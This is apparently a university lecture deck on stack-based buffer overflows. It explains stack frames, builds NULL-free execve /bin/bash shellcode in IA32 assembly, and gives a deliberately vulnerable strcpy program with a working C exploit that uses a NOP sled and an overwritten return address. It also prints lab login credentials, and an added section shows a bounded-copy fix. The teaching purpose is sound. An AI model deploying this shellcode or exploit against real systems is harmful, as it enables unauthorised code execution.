Stack-based buffer overflows Yves Younan DistriNet, Department of Computer Science Katholieke Universiteit Leuven Belgium


1 Stack-based buffer overflows
Yves Younan
DistriNet, Department of Computer Science
Katholieke Universiteit Leuven, Belgium
Yves.Younan@cs.kuleuven.ac.be

2 Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks, March 22, 2005 - 2
Overview
- Introduction
- Buffer overflows
- Stack-based buffer overflows
- Shellcode
- Code injection
- Conclusion

3 Introduction
- Buffer overflows: write outside the boundaries of an array
- Can be used to overwrite adjacent memory
- The stack contains control-flow related data, e.g. return addresses
- Overwriting this data allows an attacker to execute new or existing code


5 Buffer overflows (on IA32)

    #include <string.h>

    int main(int argc, char **argv) {
        int a;
        char buf[100];
        strcpy(buf, argv[1]);   /* unbounded copy of the first argument */
    }

- int a is allocated on the stack: 4 bytes
- buf has memory allocated for 100 chars: 100 bytes
- argv[1] could be longer than that, allowing an attacker to overwrite a in this example

6 Buffer overflow on IA32

    High addr   +-----------------+
                | int a           |
                +-----------------+
                | char buf[100]   |
    Low addr    +-----------------+

Writing past the end of buf continues toward higher addresses, into a.


8 Stack based buffer overflows

    #include <string.h>

    void f1(char *a) {
        char buffer[100];
        strcpy(buffer, a);
    }

    void f0(char *b) {
        f1(b);
    }

9 Stack-based buffer overflows: stack frames of f0 and f1

    High addr
    +------------------------+
    | Return address f0      |  Stack frame f0
    | Saved Frame Ptr f0     |
    | Local variables f0     |
    | Arguments f1           |
    +------------------------+
    | Return address f1      |  Stack frame f1 (overwritten by the overflow)
    | Saved Frame Ptr f1     |
    | Buffer (injected code) |
    +------------------------+
    Low addr

    f0:              f1:
      ...              buffer[]
      call f1          ...
                       overflow()


11 Shellcode
- Code to execute once the return address has been overwritten
- Usually inserted into the buffer that is used to overflow
- Some subtleties: a NULL byte will terminate a strcpy, \n will terminate gets

12 Example code

    #include <unistd.h>

    int main() {
        char *argv[2];
        argv[0] = "/bin/bash";
        argv[1] = 0;
        execve(argv[0], argv, 0);
    }

13 Example transformed to assembly

    .globl main
    .type main,@function
    main:
        push $0x68          # Place "h" on the stack.
        push $0x7361622f    # Place "sab/" on the stack.
        push $0x6e69622f    # Place "nib/" on the stack.
        mov  %esp,%ebx      # Copy the pointer to /bin/bash to ebx.
        xor  %edx,%edx      # Empty edx.
        push %edx           # Place a NULL on the stack to terminate the argv.
        push %ebx           # Place the pointer to /bin/bash on the stack.
        mov  %esp,%ecx      # Copy the pointer to the pointer to /bin/bash into ecx.
        mov  $0xb,%eax      # Let the syscall know we want execve.
        int  $0x80          # Do the system call.

14 Shellcode

    (gdb) x/27b main
    0x8048308 <main>:     0x6a 0x68 0x68 0x2f 0x62 0x61 0x73 0x68
    0x8048310 <main+8>:   0x2f 0x62 0x69 0x6e 0x89 0xe3 0x31 0xd2
    0x8048318 <main+16>:  0x52 0x53 0x89 0xe1 0xb8 0x0b 0x00 0x00
    0x8048320 <main+24>:  0x00 0xcd 0x80

15 Shellcode

    .globl main
    .type main,@function
    main:
        push $0x68
        push $0x7361622f
        push $0x6e69622f
        mov  %esp,%ebx
        xor  %edx,%edx
        push %edx
        push %ebx
        mov  %esp,%ecx
        xor  %eax,%eax      # set %eax to 0
        mov  $0xb,%al       # copy 0xb into %al (least significant byte of %eax)
        int  $0x80

The mov $0xb,%eax of the previous version encodes as 0xb8 0x0b 0x00 0x00 0x00; the three NULL bytes would terminate the strcpy used to inject it, so it is replaced by xor %eax,%eax and a one-byte move into %al.


17 Sample vulnerable program

    #include <string.h>

    void function(int a, char *b) {
        char string1[10];
        char string2[50];
        strcpy(string2, b);     /* unbounded copy: the overflow happens here */
    }

    int main(int argc, char **argv) {
        function(1, argv[1]);
    }

18 Sample exploit

    #include <string.h>
    #include <unistd.h>

    char shellcode[] =
        "\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89"
        "\xe3\x31\xd2\x52\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80";

    #define ADDR 0xbffffe2c

    int main() {
        char overflow[72];
        char *argv[3] = { "./bufferoverflow", overflow, NULL };
        memset(overflow, '\x90', 72);                 // fill with NOPs
        *(long *) &overflow[68] = ADDR;               // replace ret. addr.
        memcpy(overflow, shellcode, strlen(shellcode));
        execve(argv[0], argv, 0);                     // exec program
    }
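As an added example covering slides 17 and 18 (not the deck's own code): a hardened form of function() whose copy into string2 is bounded, next to a crude heuristic for the 0x90 padding the sample exploit relies on. The names bounded_copy, function_hardened and longest_nop_run are assumed here.

```c
#include <stddef.h>
#include <string.h>

/* Bounded replacement for slide 17's strcpy(string2, b): copies at most
 * dstlen-1 bytes, always NUL-terminates dst, and returns 0 on success or
 * -1 if src did not fit (dst is then empty, never a partial copy). */
int bounded_copy(char *dst, size_t dstlen, const char *src)
{
    size_t n;
    if (dst == NULL || dstlen == 0)
        return -1;
    if (src == NULL) {               /* slide 17 crashes when argv[1] is missing */
        dst[0] = '\0';
        return -1;
    }
    for (n = 0; n < dstlen && src[n] != '\0'; n++)
        ;                            /* never reads past dstlen bytes of src */
    if (n == dstlen) {               /* no NUL within the space available */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);         /* n bytes plus the terminating NUL */
    return 0;
}

/* Hardened form of the deck's function(): identical locals, so the stack
 * layout of slide 9 is unchanged; only the copy into string2 is bounded. */
int function_hardened(int a, const char *b)
{
    char string1[10];
    char string2[50];
    (void)a;
    (void)string1;
    return bounded_copy(string2, sizeof string2, b);
}

/* Crude input heuristic: slide 18's exploit pads its argument with 0x90 (NOP)
 * bytes. Returns the longest run of 0x90 bytes in s; a wrapper can log or
 * reject arguments whose run exceeds a threshold (assumed policy). */
size_t longest_nop_run(const char *s)
{
    size_t best = 0, run = 0;
    for (; *s != '\0'; s++) {
        run = ((unsigned char)*s == 0x90) ? run + 1 : 0;
        if (run > best)
            best = run;
    }
    return best;
}
```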

19 Conclusion
- Follow "Gera's Insecure Programming by example": http://community.corest.com/~gera/InsecureProgramming/
- Login/pass for the computers: cstudy/distrinet

